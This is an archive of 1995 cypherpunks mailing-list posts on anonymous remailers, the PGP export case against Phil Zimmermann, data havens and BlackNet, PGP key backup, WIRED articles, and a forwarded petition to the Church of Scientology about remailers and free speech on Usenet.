Message-ID: <Pine.SUN.3.91.950117212353.21124A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     This will only work if ALL posts have anonymous reply blocks
added, or if the posting only goes through one remailer, as there
is no way the first on the chain can know that the end destination
is a listserv, no?
 
     Homer


On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote:

> At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote:
> > ... So I'm tempted to say "tough luck" to newsgroups that
> >don't like receiving anonymous posts. The alternative is for people
> >interested to create a moderated newsgroup, where of course the moderator
> >could refuse to allow anonymous posts with or without the remailer
> >operators cooperation. ...
> 
> Another, and less onerous alternative, is to simply stick encrypted reply-to 
> blocks on messages to newsgroups.  At that point there's no real difference 
> between the anon post and a post from a system that doesn't provide real 
> name<->userid mappings, and the flames can go straight from the newsgroup to 
> the instigator without involving the remailer op.
> 
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Tue, 17 Jan 95 18:35:45 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <9501172032.AA29703@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.91.950117213146.21124H-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     The POINT is that if you chain and use pgp the remailer operator
CAN'T sell you out.  Whether or not the reop discusses or promises never
to sell you out is meaningless when the cards are down.  Trusting someone
because they SAY they are trustable is a fool's game. So up front, I say
"Who me, trustable?  Hah!", and then let people use the technology to make
sure their stuff is safe.  PGP can't be broken, and chaining can't be
traced without LOTS of difficulty, and frankly reops have little interest
really in reading people's private mail, especially when it is pgp'd, let
alone tracing them for postings that they don't even know what's being
said in them!  Right? 
 
     Homer

On Tue, 17 Jan 1995, Rick Busdiecker wrote:

>     Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET)
>     From: Mats Bergstrom <asgaard@sos.sll.se>
> 
>     This thread illustrates (at least if setups like this are
>     worthy of a place in Raph's list) that penet.fi is the safest
>     way to go for the moment.
> 
> That depends on your threat model.  For most, chaining is safer than
> penet.
> 
>     I would just hate it to have my head on the plate of a remailer
>     operator who takes an interest in subtile ethical discussion of
>     whether to sell me out or not.
> 
> Your characterization of what Homer has said strikes me as extremely
> inaccurate.
> 
> 			Rick
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 17 Jan 95 21:57:08 PST
To: cypherpunks@toad.com
Subject: EE Times on PRZ
Message-ID: <199501180556.VAA25844@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Jan 16 issue of EE Times has an excellent article on the legal
controversy surrounding Phil Zimmermann and PGP, positioned top-right
front-cover for maximal exposure.  It describes the aftermath of a
meeting last week between Phil's attorney, Philip Dubois, and the
government lawyer handling the case.  "'We told the prosecutor our
concerns,' Dubois said.  'He agreed to consider them.  We might hear
back in a month or two.  He didn't make any promises.'"

(Sometimes it seems like the gov't is dragging this case out
intentionally.  I believe the uncertainty does have a chilling effect on
private development of strong crypto, which would be gone if the
government announced it was not going to pursue the case, or if they did
bring charges and lost.)

Another interesting quote: "Zimmermann is not in danger of being indicted
for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
considering charging him for making PGP available in such a manner that
it could be exported by a third party."  What the hell is this?  Can
anyone point to the statute they may be referring to here?  This seems
awfully broad.

This, from a sidebar, is really surprising:  "In contrast, public keys
allow the overt publication of an encryption key, because decryption keys
can only be derived through a mathematically difficult process, such as
large prime-number factoring.  Contrary to popular belief, the NSA can
decrypt public keys of most practical key sizes."  I wonder what this
means?  If it is a claim that the NSA can factor 1024 bit moduli that
would certainly come as a big surprise.  If they are saying that they can
do 512 bits that would be more believable although of interest.  It is
strange that the author would include a statement like this without
attribution or evidence.

Generally, the article is very favorable towards Phil and an excellent
overview of the case.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxytnBnMLJtOy9MBAQHGnAH/TAOr6TNchZjCyMESeDdOf1seXTkfMbMY
3qrL91OmjwxDIBDkzszrgizwadKwWYn65yOY3yJ4Wk/xUcNwKFnk1Q==
=PoYj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 17 Jan 95 23:30:20 PST
To: rishab@dxm.ernet.in
Subject: Re: Known data havens for pirates? Doubtful
In-Reply-To: <gate.ms64yc1w165w@dxm.ernet.in>
Message-ID: <199501180700.XAA14684@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The comments about data havens have been interesting to read. Being
the analytic-retentive type, I like to view things as tables and
graphs, of such things as: who knows location (nobody, some,
everybody) vs. types of data supported, for example. But I won't make
such a table here, now.

[Note on my responses. Netcom is not accepting mail connections, so
Cypherpunk mail basically doesn't arrive from the early morning to
very late in the evening. This has to do with toad not using "MX mail
records," as near as we could figure out. Please don't send
suggestions, as I can't get either toad or Netcom changed. I merely
point this out to explain why I basically am out of the debate during
the day. The information highway is becoming a dirt road.]

I mainly agree with Rishab's point: the idea of a known, fixed
location that carries Infocalypse material is deeply flawed. Data
havens just won't be in known locations, at least not primarily.

While I found Bruce Sterling's "data havens" in the Caribbean, Africa,
and Asia interesting and provocative, they made no sense as viable,
stable entities. No site which is _known_ to be a Warez site, a
bootleg Nazi medical data site, a copyright violation haven, etc.,
will last for long. Whether knocked out as a result of a
U.N. Resolution (infinitely easier than zapping Saddam), or sabotaged
the way the French SDECE hit the "Rainbow Warrior," or merely
subverted at ground level, the site cannot last. "The Center cannot
hold."

Fortunately, there is no reason for data havens to be in fixed
locations. Or in traceable, identifiable locations.

My BlackNet thought experiment was much more than a mere Gedanken
experiment: as many of you learned, it was/is a real key, and 2-way
communication has happened. Of course, you mostly all know I was the
instigator (and those who don't haven't followed the debate and/or
haven't read the Cyphernomicon section on BlackNet).

rishab@dxm.ernet.in wrote:

> I suppose you _are_ aware that the US has threatened China with punitive
> duties on $100 BILLION dollars worth of trade, and that China has started
> holding some show trials (without shutting down its state-owned CD-piracy
> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down 
> eventually. What may be likely is distributed piracy markets, such as 
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> described in Tim's BlackNet spoof.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Yes, this is the way to go. The data havens have a location that is a
public key in cyberspace. Think of it as one entity placing an
anonymous, untraceable classified ad in a newspaper, readable by many,
and others placing ads in response. A two-way communication channel is
thus opened up, without regard for the physical location of each, the
nature of the communication, the data to be transferred, etc.

All of that is just detail.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 17 Jan 95 23:24:16 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: remailer security
Message-ID: <v01510106ab427094ff06@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 8:50 PM 1/17/95, Mats Bergstrom wrote:
>There are ways of
>multiple chaining for the lazy, though: C2 lets you pick the chained
>sites by clicking on a web-page (but does it encrypt??).

No it doesn't. Which dramatically reduces its usefulness. There should be
some way to add encryption envelopes to the CGI script. Premail?

- --Lucky <who is about to find out if the new MacPGP and scripts that he
picked up finally solved his clearsig problems>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Not-the-Real MacPGPv262

-----END PGP SIGNATURE-----

-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
Date: Tue, 17 Jan 95 21:56:41 PST
To: cypherpunks@toad.com
Subject: Key backup (was: How do I know . ..)
Message-ID: <199501180601.BAA16566@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

'Stig' was reported to have written:

> Eric Hughes wrote:
> > 
> > pointer-to-chunk to each of 7 different people.  In the case of
> > catastrophe, you can recover your key.
> > 

> I'll second Eric on the utility of this practice.  I should've done this...
> I lost a new pgp key when my hard disk hit the fan last month.  I can't even
> revoke it...  

The "spread spectrum" approach might well be indicated for some life-or-
death key security matters, but the vast majority of PGP users probably
don't need or want to play Spy vs. Spy with their friends to backup keys.
There must be a more reasonable way to backup non-critical keys. Magnetic
media is much more reliable than it used to be, and less reliable than it
will soon be, but it's still vulnerable to phenomena such as EMP. Friends
are vulnerable to death and disagreements which may end their willingness
to participate in the reconstruction of your key.

I recognize that you can't just leave your private keyring lying around
indiscriminately (especially if it's labeled "PGP private keyring"), but
what's to prevent it from being reproduced in some kind of hard copy form
(barcode? ASCII?) on some durable stock (credit card plastic?) and tucked
away someplace especially safe? A credit card (postage stamp?) sized flat
item is pretty easy to hide, especially if its real function isn't obvious.
I guarantee you that I can hide such an object in my home, tell you it's
here somewhere, and watch you die of old age before you and a small armada
of your henchmen can find it.

If it's still "passphrase-protected", an attacker would a) have to know
what to look for, b) have to find it, and c) obtain the passphrase. A
"brute force" physical attack (ie: machine seizure and thumbscrews) or
TEMPEST-based attack would, IMO, be less effort on the part of the
attacker and is therefore the practical limit on private keyring security.

Explanations as to why this would be a Bad Idea are actively solicited.


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxyupioZzwIn1bdtAQErMgGAnlr/g/eLesvcCh9IdXy7RzH2vkKbC/x7
pbm/OA+W7z15ix0PzHOZ/vwpg9X5JBku
=TRHd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Wed, 18 Jan 95 18:10:33 PST
To: cypherpunks@toad.com
Subject: Lance Rose writes anti-cryptoanarchy in WIRED
Message-ID: <gate.i724yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



I've missed recent traffic so forgive me if this has already come up.

Lance Rose writes a particularly twisted piece in the Idees Fortes section of
WIRED 3.02 (February). His basic premise is that traditional forms of
copyright law are sufficient to ensure that the Net poses only limited 
problems to mass content producers such as Time Warner. I agree with this,
as most people feel uncomfortable about 'stealing' however impossible it is
to detect. Lance Rose, though, goes on to insist that the reason for the
copyright law's strength will be the power of the omnipresent Net Cops (sic).
So that you don't consider him entirely ignorant, he acknowledges the 
increasing use of anon remailers. However, he adds (repeatedly), "Can't
we all use anonymous remailers to keep the Net knee-deep in infringing copies?
Nope. Net cops can swiftly clean each new infringement out of the major online
markets as soon as it appears." 

How will they do this so efficiently? By "deploying software agents" net-wide
to "search out anonymous infringements." He later admits the possibility of
"friend-to-friend" markets, but rejects the possibility of such markets growing
out of hand, as "few or none of the participants will know everyone else in the
circle" allowing cops to join them undetected (as if the Information Liberation
Front would mind giving the _cops_ pirated software). "A symbolic legal attack"
every once in a while will scare would-be black-marketeers.

Later, he does discuss the hidden costs of acquiring pirated versus genuine 
stuff - "the time and effort needed to track down pirate dealers [...] 
who are so deep underground even the cops can't find them."

Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for
anon-remailers (which exist today on Sameer's c2.org blind server) and
data havens. I haven't bothered to hunt for Lance's address, which is not
given, but really I thought someone as prominent a SysLawyer as him would
be clued in. Nor have I found the time to send WIRED a letter. 

OTOH maybe ignorance, for LEA-friendly legislators who read WIRED, is bliss?
Let the sleeping dog lie, etc, just finish your data haven code ;-]

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 17 Jan 95 22:23:59 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com>
Message-ID: <199501180623.BAA02464@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Hal:
: 
: Another interesting quote: "Zimmermann is not in danger of being indicted
: for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
: considering charging him for making PGP available in such a manner that
: it could be exported by a third party."  What the hell is this?  Can
: anyone point to the statute they may be referring to here?  This seems
: awfully broad.
: 

In a related story:
The U.S. attorney's office is also considering charging GM, Ford, and
Chrysler for making automobiles available in such a manner that people 
could run someone over and leave the scene of the accident.

:)

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Tue, 17 Jan 95 14:26:48 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <ceN9Zc5w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

> rishab@dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined." I didn't even know the
> > _was_ a charter.
> 
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...

Though I don't recall seeing her post to the list, I'll borrow Tim's words 
from the Cyphernomicon:

   2.4.10. "Where did the name 'Cypherpunks' come from?"
           + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000,"
              was at the earliest meetings...she quipped "You guys are
              just a bunch of cypherpunks." The name was adopted
              immediately.


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 18 Jan 95 00:43:41 PST
To: cypherpunks@toad.com
Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd)
Message-ID: <pAD7lKjqRe1O077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I thought this was topical and VERY much of interest here.

Sam

- -------- Forwarded message --------
Newsgroups: alt.2600,alt.activism,alt.atheism,alt.censorship,alt.clearing.technology,alt.conspiracy,
Date: Tue, 17 Jan 1995 15:23:44 GMT
From: noring@netcom.com (Jon Noring)
Subject: --> A Net-Petition to the Church of Scientology, Please Read


[Hurry!  Signature tallying for this petition EXPIRES February 6, 1995!
Be sure to send your signature to cos-petition@netcom.com -- see the
instructions after the petition statement.  The petition statement
begins 68 lines down from here.]


Following this short introductory section is the petition statement to
the Church of Scientology and affiliated organizations regarding their
recent legal actions which have very serious ramifications for freedom
of expression on Usenet and the Internet.  It is somewhat long, but the
length is necessary to give you sufficient information to make an
informed decision.

I want to stress that this petition is NOT focused on the beliefs or
practices of the Church of Scientology.  Rather, it is focused on their
recent legal action, and this petition demands that they reconsider
these actions for the good of everyone, including themselves.  It should
also be made *very clear* that none of us should ever condone or support
any action which would censor or inhibit Scientology supporters from
being able to express their views and opinions on Usenet, the Internet,
and all other electronic forums, provided they do so in accordance with
accepted netiquette, as all of us should.

I encourage you to read the petition statement carefully, and if you
agree with all three demands (given near the end of the statement), to
then "sign" it via Internet e-mail using the instructions which follow
the statement.  Do follow EXACTLY the directions on how to "sign";
they are not difficult.

Note that only those with valid Internet-accessible e-mail addresses can
sign this petition.  Fortunately, nearly all on-line services, such as
CompuServe, and many BBS, do offer Internet e-mail access, so just about
anybody who is electronically hooked up to some network in the world can
sign this petition.  If you are not sure what your Internet e-mail
address is, ask your site's sysadmin/sysop for assistance.

Please do upload this petition statement as soon as possible to any BBS
and on-line service in your area.  If you have access to one of the
major national on-line services such as CompuServe, Prodigy, AOL, etc.,
do try to upload it there.  We are trying to get at least 5000
signatures.  Even more signatures are entirely possible if we each put
in a little effort to inform others, such as friends and coworkers,
about the importance of this petition to electronic freedom of
expression.

I plan to make the signatures publicly available on or shortly after
February 7, 1995, and will also submit them to the Church of Scientology
as well as the newsmedia.

Important Note:  Because of the unusual sensitivity of this petition, I
will not submit nor reveal the e-mail signatures IF the total number of
validated signatures is less than 1000.  This offer is made for those
who would feel "exposed" if their name appears on a list with a small
number of signatures.  I fully expect to surpass 1000 signatures in one
or two days!  In addition, unlike past net-petitions, providing one's
full name in addition to one's e-mail address will be optional.
However, I highly encourage you to be brave and include your full name,
as all petitions are traditionally considered more "binding" if real
names are used.  I will tally the number of signatures with and without
full names when the petition drive ends February 6, 1995.

Thank you for your signature!  Let's all do our part to keep all
electronic networks free and open for everybody.

Jon Noring

(Disclaimer:  Nothing written in this petition transmittal should be
              construed as legal advice.  If you need legal assistance
              or advice concerning any of the issues brought up in this
              document, contact a qualified attorney.)


**************** Beginning of Petition Statement ********************

TO: The Church of Scientology, The Religious Technology Center, Bridge
    Publications, Inc., Office of Special Affairs, and all other
    affiliated organizations, divisions and corporations of the Church
    of Scientology

We, the undersigned, are disturbed by your recent legal attempts to
stifle the free flow of information on the Internet and Usenet.
Specifically, you have 1) threatened legal action against several
automated anonymous remailers unless they filter out *all* e-mail
targeted to the legitimate Usenet newsgroups alt.religion.scientology
(a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all
points of view about Scientology, both pro and con, are welcome, and
2) demanded and actually attempted the removal of a.r.s. in gross
defiance of accepted Usenet practice and netiquette.

Concerning 1), since nearly all (if not all) of the e-mail sent to
a.r.s. and a.c.t. via the remailers is legitimate and originates from
individuals who sincerely believe they need to post anonymously because
of the nature of discussion, your demand, if implemented, would prevent
these individuals from freely expressing their views in the proper
forum.  Freedom of expression is internationally recognized as one of
the most important and sacred of basic human rights, and your demands
fly in the face of this recognition.  Your second demand, removing
a.r.s., would go even further in inhibiting freedom of expression on
all electronic networks.  It is a *very* serious matter to attempt to
remove forums of free expression.

Your primary argument for issuing these legal threats, according to
your statements, is that some people (the "perpetrators") have
knowingly posted *alleged* (meaning not yet demonstrated in a court of
law) Church of Scientology copyrighted and trade secret material to
a.r.s. and a.c.t., sometimes using the anonymous remailers as the
carrier (because of the common carrier-like nature of anonymous
remailers, the administrators of the remailers have no knowledge of such
activity taking place).  Though we do not condone making copyrighted
material available on any electronic network without the permission of
the copyright holder, your specific legal threats are short-sighted,
perceived to be mean-spirited, ineffective, and are on tenuous legal
grounds because

1) It won't stop those who are determined to make available alleged
   copyrighted materials on electronic networks.  They will find other
   avenues on the electronic networks to do so.  Only prosecuting the
   actual perpetrators will deter this alleged illegal activity.
2) Your demands, if met, will have the effect of leading to significant
   stifling of free speech and the exchange of information on all
   electronic networks which, if not illegal in some jurisdictions, goes
   against all accepted conventions of a free and open society,
3) You have not stated, nor is there any indication, that you intend to
   work in a cooperative manner with legitimate law-enforcement
   agencies, the courts, and/or the Internet to locate and prosecute
   the perpetrators of the *alleged* copyright violations in the
   countries they originated.

Thus, your threats are being construed, rightly or wrongly, by most on
the electronic networks as an attempt to stifle free discussion on
Scientology rather than trying to locate and prosecute the perpetrators
of the *alleged* copyright and trade secret violations.

With respect to the attempted removal of the newsgroup a.r.s., you also
stated that the word 'scientology' is trademarked and thus the name
a.r.s. infringes on such trademark.  This is appallingly ludicrous based
on past case law of similar situations, as well as your implicit
acknowledgement of the legitimacy of a.r.s. by allowing Church of
Scientology approved information to be posted to it by your supporters,
and possibly with your knowledge and/or approval, ever since it was
created July 1991, almost 3.5 years ago.

Therefore, we, the undersigned, make the following demands.

1) Regarding your charges of copyright violation over electronic
   networks:  You will cease all legal action, now and in the future,
   against any person, company, organization, etc., associated or
   affiliated in any way with all electronic networks, including the
   Internet, except that action which is necessary to locate and
   prosecute the perpetrators (as previously defined) of alleged
   copyright and trade secret violations, and other activity in
   violation of law, and *only* in full cooperation with legitimate
   law-enforcement agencies and/or the courts.

2) Regarding your trademark challenge of the Usenet newsgroup
   alt.religion.scientology:  You will cease all legal action, now and
   in the future, to remove any Usenet newsgroup, BBS forum, mailing
   list or other similar forum of public exchange of information over
   any electronic network, or to inhibit in any way the flow of
   information to and from these forums.  This includes, for example,
   ceasing all legal action demanding a) the removal of the Usenet
   newsgroup alt.religion.scientology and b) that anonymous remailers
   add filters as previously described.

3) You will publicly and officially state

   a) That you support the existence of free and open forums on all
      electronic networks to discuss Scientology from all perspectives
      and points of view (which includes yours), and

   b) That you do not support nor condone attempts by any entity to
      electronically censor, remove, obstruct, or tamper with any
      electronic communication except when allowed by a valid court
      order.

If you outright reject or refuse to even discuss these demands in a good
faith manner on Usenet, we have no other option but to consider such
rejection or refusal to even discuss to be an act of hostility by the
Church of Scientology towards the users of all electronic networks and
forums, including the Internet.  We are certain you do not want this,
and we do not want it either, so we offer to work with you any way we
can with regard to any legitimate demands you may have concerning
alleged copyright violation(s) and other illegal activity.

However, any attempts by you of any kind to tamper or in any manner
restrict the free flow of information (other than that *specifically*
restricted by law -- and *only* that) on any electronic network is
totally unacceptable and will not be tolerated for the reasons stated
above.

Signed,




******************* End of Petition Statement ***********************

======================================
Instructions for Signing This Petition
======================================

It must first be noted that this is a petition, not a vote.  By
"signing" it you agree with *all* the demands of the petition
statement.  If you do not agree with all the demands, then your only
recourse is to not sign it.

In addition, all e-mail signatures will be submitted to the Church of
Scientology as well as the newsmedia provided more than 1000 validated
signatures are obtained.  Including your full name is optional, but
very highly encouraged as that would add to the effectiveness of the
petition.  Signing via an anonymous remailer is discouraged, but not
forbidden, as an attempt will be made to separately tally signatures
from anonymous remailers.

Signing this petition is not hard, but to make sure your signature is
not lost or miscounted, please follow these directions exactly:

1) Prepare an e-mail message.  In the main body (NOT the Subject line)
   of your e-mail include the ONE-LINE statement:

SIGNED <Internet e-mail address> <Your full name (optional)>

   You need not include the "<" and ">" characters.  'SIGNED' should
   be capitalized.  As stated above, your full name is optional, but
   highly recommended.  If you do supply your name, please don't use
   a pseudonym or nickname, or your first name -- it's better to just
   leave it blank if it's not your full and real name.

              ***************************************
              Example:  My e-mail signature would be:

              SIGNED noring@netcom.com Jon E. Noring
              ***************************************

2) Please DON'T include a copy of this petition, nor any other text,
   in your e-mail message.  If you have comments to make, send e-mail
   to me personally, and NOT to the special petition e-mail signature
   address.

3) Send your e-mail message containing your signature to the following
   Internet e-mail address and NOT to me:

                     ===========================
                       cos-petition@netcom.com
                     ===========================

4) Within a few days of receipt of your signature, an automated
   acknowledgment will be e-mailed to you for e-mail address
   verification purposes.  You do not need to respond or reply to
   this acknowledgement when you receive it.


Thank you for signing this petition!

Jon Noring

(p.s., send your signature to cos-petition@netcom.com)


- --
OmniMedia           | The Electronic Bookstore.  Come in and browse!  Two
1312 Carlton Place  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
Livermore, CA 94550 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
510-294-8153        | E-book publishing service follows NWU recommendations.


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
     A skydiving school is one in which you MUST be a dropout to graduate

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 17 Jan 95 14:26:56 PST
To: cypherpunks@toad.com
Subject: Known data havens for pirates? Doubtful
Message-ID: <gate.ms64yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


I forget who wrote:
> blame them. Copyrighted data on a server in a jurisdiction that
> doesn't acknowledge the copyrights - a prime use for Data Havens
> when they come of age.

I suppose you _are_ aware that the US has threatened China with punitive
duties on $100 BILLION dollars worth of trade, and that China has started
holding some show trials (without shutting down its state-owned CD-piracy
factories). It's not going to be easy to find a country more willing and
able to ignore international copyright law (Berne Convention etc) than China;
however, despite howls of protest even China is likely to knuckle down 
eventually. What may be likely is distributed piracy markets, such as 
described in Tim's BlackNet spoof.

Read my earlier post on what Lance Rose thinks.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 18 Jan 95 00:00:22 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
Message-ID: <199501180805.DAA18028@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Hal quotes the 1/16/95 EE Times:
> "Zimmermann is not in danger of being indicted
> for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
> considering charging him for making PGP available in such a manner that
> it could be exported by a third party."

This is very odd indeed. It reminds me of the "like-a-book" shrink-wrap
software license agreements. Did they expect PRZ to run PGP solely on
a single computer at home, and allow house guests to use it ? Copies of a
piece of software can obviously be handled in any fashion by their possessors.
I can't conceive of a way to make software available without distributing
copies, other than allowing global execute permission (but not read permission)
for a copy running on an *ahem* "unhackable" server. I find it difficult to
believe, however, that arms export control statutes written for munitions
hardware mandate this extreme restriction on access. Such laws would turn the
export-controlled section of a gun store into an analogue of the reference
section of a library -- "you can use it here, but you can't check it out".
People using strong crypto remotely are forced to trust the remote crypto
server to some extent, which tends to defeat the whole purpose of the exercise.
It also starts to sound like a model for GAK.... :[

Anyone have an email address for someone at EE Times ?

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxzLrCoZzwIn1bdtAQGZKQGA1gpT6cXWN4pAwlRw2vOJJYCZvruyBde2
BOATJ32Sg19wwUXUk7z7A8VnVNU59twG
=kjXQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Tue, 17 Jan 95 14:54:15 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <5eP9Zc3w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) writes:

> > rishab@dxm.ernet.in says:
> > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > > member of the cypherpunks - a term that she coined." I didn't even know t
> > > _was_ a charter.
> > 
> > Or a Jude Milhon, for that matter. Another example of the continuing
> > decay of a once proud magazine...
> 
> I'm not sure what Perry's not having heard of Jude Milhon is supposed
> to mean, or how "Wired" interviewing her is "another example of the
> continuing decay," etc.

I suppose I should have elaborated in my original post. Of course I know
of Jude's role in cypherpunk history; in fact I thought it would interest
cpunks to know that she was interviewed. As for the 'charter' - it was 
no doubt WIRED's creative interpretation.

> She's not presently subscribed and hence can't speak up in this
> strange matter of how an interview with her implies a magazine is in
> decay.

Speaking of which, the list membership has hit 640. I'll be posting a
membership profile soon, since it's a year since I saw the one that
got me out of 'lurk mode' when I discovered I was the only cpunk in this
region.


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





